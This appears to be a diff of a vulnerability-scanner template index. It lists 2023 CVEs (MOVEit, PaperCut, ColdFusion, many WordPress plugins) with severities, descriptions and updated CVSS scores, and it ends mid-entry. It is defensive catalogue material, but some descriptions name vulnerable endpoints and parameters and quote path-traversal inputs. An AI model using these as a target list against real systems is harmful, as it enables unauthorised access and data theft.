{"ID":"CVE-2023-2732","Info":{"Name":"MStore API \u003c= 3.9.2 - Authentication Bypass","Severity":"critical","Description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2732.yaml"} {"ID":"CVE-2023-27350","Info":{"Name":"PaperCut - Unauthenticated Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27350.yaml"} {"ID":"CVE-2023-27372","Info":{"Name":"SPIP - Remote Command Execution","Severity":"critical","Description":"SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27372.yaml"} -{"ID":"CVE-2023-27482","Info":{"Name":"Home Assistant Supervisor - Authentication Bypass","Severity":"critical","Description":"Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2023/CVE-2023-27482.yaml"} -{"ID":"CVE-2023-27524","Info":{"Name":"Apache Superset - Authentication Bypass","Severity":"high","Description":"Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.","Classification":{"CVSSScore":"8.9"}},"file_path":"http/cves/2023/CVE-2023-27524.yaml"} +{"ID":"CVE-2023-27482","Info":{"Name":"Home Assistant Supervisor - Authentication Bypass","Severity":"critical","Description":"Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-27482.yaml"} +{"ID":"CVE-2023-27524","Info":{"Name":"Apache Superset - Authentication Bypass","Severity":"critical","Description":"Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27524.yaml"} {"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"} +{"ID":"CVE-2023-2766","Info":{"Name":"Weaver OA 9.5 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in Weaver OA 9.5 and classified as problematic. This issue affects some unknown processing of the file /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini. The manipulation leads to files or directories accessible. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2766.yaml"} +{"ID":"CVE-2023-2779","Info":{"Name":"Super Socializer \u003c 7.13.52 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2779.yaml"} {"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"} +{"ID":"CVE-2023-27922","Info":{"Name":"Newsletter \u003c 7.6.9 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-27922.yaml"} +{"ID":"CVE-2023-2796","Info":{"Name":"EventON \u003c= 2.1 - Missing Authorization","Severity":"medium","Description":"The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-2796.yaml"} {"ID":"CVE-2023-28121","Info":{"Name":"WooCommerce Payments - Unauthorized Admin Access","Severity":"critical","Description":"An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28121.yaml"} -{"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"} +{"ID":"CVE-2023-2813","Info":{"Name":"Wordpress Multiple Themes - Reflected Cross-Site Scripting","Severity":"medium","Description":"All of the above Aapna WordPress theme through 1.3, Anand WordPress theme through 1.2, Anfaust WordPress theme through 1.1, Arendelle WordPress theme before 1.1.13, Atlast Business WordPress theme through 1.5.8.5, Bazaar Lite WordPress theme before 1.8.6, Brain Power WordPress theme through 1.2, BunnyPressLite WordPress theme before 2.1, Cafe Bistro WordPress theme before 1.1.4, College WordPress theme before 1.5.1, Connections Reloaded WordPress theme through 3.1, Counterpoint WordPress theme through 1.8.1, Digitally WordPress theme through 1.0.8, Directory WordPress theme before 3.0.2, Drop WordPress theme before 1.22, Everse WordPress theme before 1.2.4, Fashionable Store WordPress theme through 1.3.4, Fullbase WordPress theme before 1.2.1, Ilex WordPress theme before 1.4.2, Js O3 Lite WordPress theme through 1.5.8.2, Js Paper WordPress theme through 2.5.7, Kata WordPress theme before 1.2.9, Kata App WordPress theme through 1.0.5, Kata Business WordPress theme through 1.0.2, Looki Lite WordPress theme before 1.3.0, moseter WordPress theme through 1.3.1, Nokke WordPress theme before 1.2.4, Nothing Personal WordPress theme through 1.0.7, Offset Writing WordPress theme through 1.2, Opor Ayam WordPress theme through 18, Pinzolo WordPress theme before 1.2.10, Plato WordPress theme before 1.1.9, Polka Dots WordPress theme through 1.2, Purity Of Soul WordPress theme through 1.9, Restaurant PT WordPress theme before 1.1.3, Saul WordPress theme before 1.1.0, Sean Lite WordPress theme before 1.4.6, Tantyyellow WordPress theme through 1.0.0.5, TIJAJI WordPress theme through 1.43, Tiki Time WordPress theme through 1.3, Tuaug4 WordPress theme through 1.4, Tydskrif WordPress theme through 1.1.3, UltraLight WordPress theme through 1.2, Venice Lite WordPress theme before 1.5.5, Viala WordPress theme through 1.3.1, viburno WordPress theme before 1.3.2, Wedding Bride WordPress theme before 1.0.2, Wlow WordPress theme before 1.2.7 suffer from the same issue about the search box reflecting the results causing XSS which allows an unauthenticated attacker to exploit against users if they click a malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2813.yaml"} +{"ID":"CVE-2023-2822","Info":{"Name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2822.yaml"} +{"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"high","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"} {"ID":"CVE-2023-28343","Info":{"Name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","Severity":"critical","Description":"Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28343.yaml"} {"ID":"CVE-2023-28432","Info":{"Name":"MinIO Cluster Deployment - Information Disclosure","Severity":"high","Description":"MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-28432.yaml"} -{"ID":"CVE-2023-29084","Info":{"Name":"ManageEngine ADManager Plus - Command Injection","Severity":"high","Description":"Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29084.yaml"} +{"ID":"CVE-2023-28665","Info":{"Name":"Woo Bulk Price Update \u003c2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The Woo Bulk Price Update WordPress plugin, in versions \u003c 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-28665.yaml"} +{"ID":"CVE-2023-29084","Info":{"Name":"ManageEngine ADManager Plus - Command Injection","Severity":"high","Description":"Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-29084.yaml"} +{"ID":"CVE-2023-29298","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29298.yaml"} +{"ID":"CVE-2023-29300","Info":{"Name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","Severity":"critical","Description":"Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29300.yaml"} +{"ID":"CVE-2023-29357","Info":{"Name":"Microsoft SharePoint - Authentication Bypass","Severity":"critical","Description":"Microsoft SharePoint Server Elevation of Privilege Vulnerability\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29357.yaml"} +{"ID":"CVE-2023-29439","Info":{"Name":"FooGallery plugin \u003c= 2.2.35 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin \u003c= 2.2.35 versions.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29439.yaml"} {"ID":"CVE-2023-29489","Info":{"Name":"cPanel - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29489.yaml"} {"ID":"CVE-2023-29622","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29622.yaml"} {"ID":"CVE-2023-29623","Info":{"Name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29623.yaml"} +{"ID":"CVE-2023-2982","Info":{"Name":"Miniorange Social Login and Register \u003c= 7.6.3 - Authentication Bypass","Severity":"critical","Description":"The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2982.yaml"} {"ID":"CVE-2023-29887","Info":{"Name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","Severity":"high","Description":"A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29887.yaml"} -{"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"high","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"} -{"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"high","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"8.9"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"} -{"ID":"CVE-2023-29923","Info":{"Name":"PowerJob \u003c=4.3.2 - Unauthenticated Access","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29923.yaml"} +{"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"critical","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"} +{"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"} +{"ID":"CVE-2023-29923","Info":{"Name":"PowerJob \u003c=4.3.2 - Unauthenticated Access","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-29923.yaml"} +{"ID":"CVE-2023-30013","Info":{"Name":"TOTOLink - Unauthenticated Command Injection","Severity":"critical","Description":"TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the \"command\" parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30013.yaml"} {"ID":"CVE-2023-30019","Info":{"Name":"Imgproxy \u003c= 3.14.0 - Server-side request forgery (SSRF)","Severity":"medium","Description":"imgproxy \u003c=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30019.yaml"} -{"ID":"CVE-2023-30210","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-30210.yaml"} -{"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"} +{"ID":"CVE-2023-30150","Info":{"Name":"PrestaShop leocustomajax 1.0 \u0026 1.0.0 - SQL Injection","Severity":"critical","Description":"PrestaShop leocustomajax 1.0 and 1.0.0 are vulnerable to SQL Injection via modules/leocustomajax/leoajax.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30150.yaml"} +{"ID":"CVE-2023-30210","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30210.yaml"} +{"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"} +{"ID":"CVE-2023-30256","Info":{"Name":"Webkul QloApps 1.5.2 - Cross-site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30256.yaml"} +{"ID":"CVE-2023-30625","Info":{"Name":"Rudder Server \u003c 1.3.0-rc.1 - SQL Injection","Severity":"high","Description":"Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-30625.yaml"} +{"ID":"CVE-2023-30777","Info":{"Name":"Advanced Custom Fields \u003c 6.1.6 - Cross-Site Scripting","Severity":"medium","Description":"Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30777.yaml"} +{"ID":"CVE-2023-30868","Info":{"Name":"Tree Page View Plugin \u003c 1.6.7 - Cross-Site Scripting","Severity":"medium","Description":"The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30868.yaml"} +{"ID":"CVE-2023-30943","Info":{"Name":"Moodle - Cross-Site Scripting/Remote Code Execution","Severity":"medium","Description":"The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. Moodle versions 4.1.x before 4.1.3 and 4.2.x before 4.2.0 are susceptible to an unauthenticated arbitrary folder creation, tracked as CVE-2023-30943. An attacker can leverage the creation of arbitrary folders to carry out a Stored Cross-Site Scripting (XSS) attack on the administration panel, resulting in arbitrary code execution on the server as soon as an administrator visits the panel.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30943.yaml"} {"ID":"CVE-2023-31059","Info":{"Name":"Repetier Server - Directory Traversal","Severity":"high","Description":"Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-31059.yaml"} +{"ID":"CVE-2023-31465","Info":{"Name":"TimeKeeper by FSMLabs - Remote Code Execution","Severity":"critical","Description":"An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31465.yaml"} {"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"} -{"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"medium","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"} +{"ID":"CVE-2023-32117","Info":{"Name":"Integrate Google Drive \u003c= 1.1.99 - Missing Authorization via REST API Endpoints","Severity":"high","Description":"The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2023/CVE-2023-32117.yaml"} +{"ID":"CVE-2023-3219","Info":{"Name":"EventON Lite \u003c 2.1.2 - Arbitrary File Download","Severity":"medium","Description":"The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors\nto access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-3219.yaml"} +{"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"high","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"} {"ID":"CVE-2023-32243","Info":{"Name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","Severity":"critical","Description":"Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32243.yaml"} -{"ID":"CVE-2023-32315","Info":{"Name":"Openfire Administration Console - Authentication Bypass","Severity":"high","Description":"Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-32315.yaml"} +{"ID":"CVE-2023-32315","Info":{"Name":"Openfire Administration Console - Authentication Bypass","Severity":"high","Description":"Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32315.yaml"} +{"ID":"CVE-2023-32563","Info":{"Name":"Ivanti Avalanche - Remote Code Execution","Severity":"critical","Description":"An unauthenticated attacker could achieve the code execution through a RemoteControl server.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32563.yaml"} +{"ID":"CVE-2023-33338","Info":{"Name":"Old Age Home Management System v1.0 - SQL Injection","Severity":"critical","Description":"Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33338.yaml"} +{"ID":"CVE-2023-33405","Info":{"Name":"BlogEngine CMS - Open Redirect","Severity":"medium","Description":"Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-33405.yaml"} +{"ID":"CVE-2023-33439","Info":{"Name":"Faculty Evaluation System v1.0 - SQL Injection","Severity":"high","Description":"Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33439.yaml"} +{"ID":"CVE-2023-33440","Info":{"Name":"Faculty Evaluation System v1.0 - Remote Code Execution","Severity":"high","Description":"Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33440.yaml"} +{"ID":"CVE-2023-3345","Info":{"Name":"LMS by Masteriyo \u003c 1.6.8 - Information Exposure","Severity":"medium","Description":"The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-3345.yaml"} {"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"} -{"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"} -{"ID":"CVE-2023-34362","Info":{"Name":"MOVEit Transfer - Remote Code Execution","Severity":"critical","Description":"In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34362.yaml"} +{"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"} +{"ID":"CVE-2023-33584","Info":{"Name":"Enrollment System Project v1.0 - SQL Injection Authentication Bypass","Severity":"critical","Description":"Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed 